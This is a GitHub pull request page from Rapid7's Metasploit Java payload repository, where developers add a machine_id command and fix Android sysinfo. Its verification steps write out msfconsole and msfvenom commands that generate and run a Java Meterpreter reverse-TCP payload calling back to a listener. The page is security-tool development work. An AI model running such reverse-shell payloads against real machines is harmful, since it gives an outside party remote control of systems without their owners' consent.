rapid7 / metasploit-javapayload

THIS REPO IS OBSOLETE. USE https://github.com/rapid7/metasploit-payloads INSTEAD
87 stars 82 forks source link

add machine_id and fix android sysinfo as root #40

Closed timwr closed 9 years ago

timwr commented 9 years ago

Verification:

./msfconsole -qx "use exploit/multi/handler; set payload java/meterpreter/reverse_tcp; set lhost $LHOST; set lport 4444; set ExitOnSession false; run -j"
# run the java meterpreter
./msfvenom -p java/meterpreter/reverse_tcp LHOST=$LHOST LPORT=4444 -o met.jar
java -jar met.jar
bcook-r7 commented 9 years ago

It doesn't seem to work with java (I get an Operation failed: 1 running on OS X) but android works fine.

meterpreter > machine_id
[+] Machine ID: c7921176c73a53987cb8d10a3911e2ae
bcook-r7 commented 9 years ago

I'll merge this for now, we can improve java later.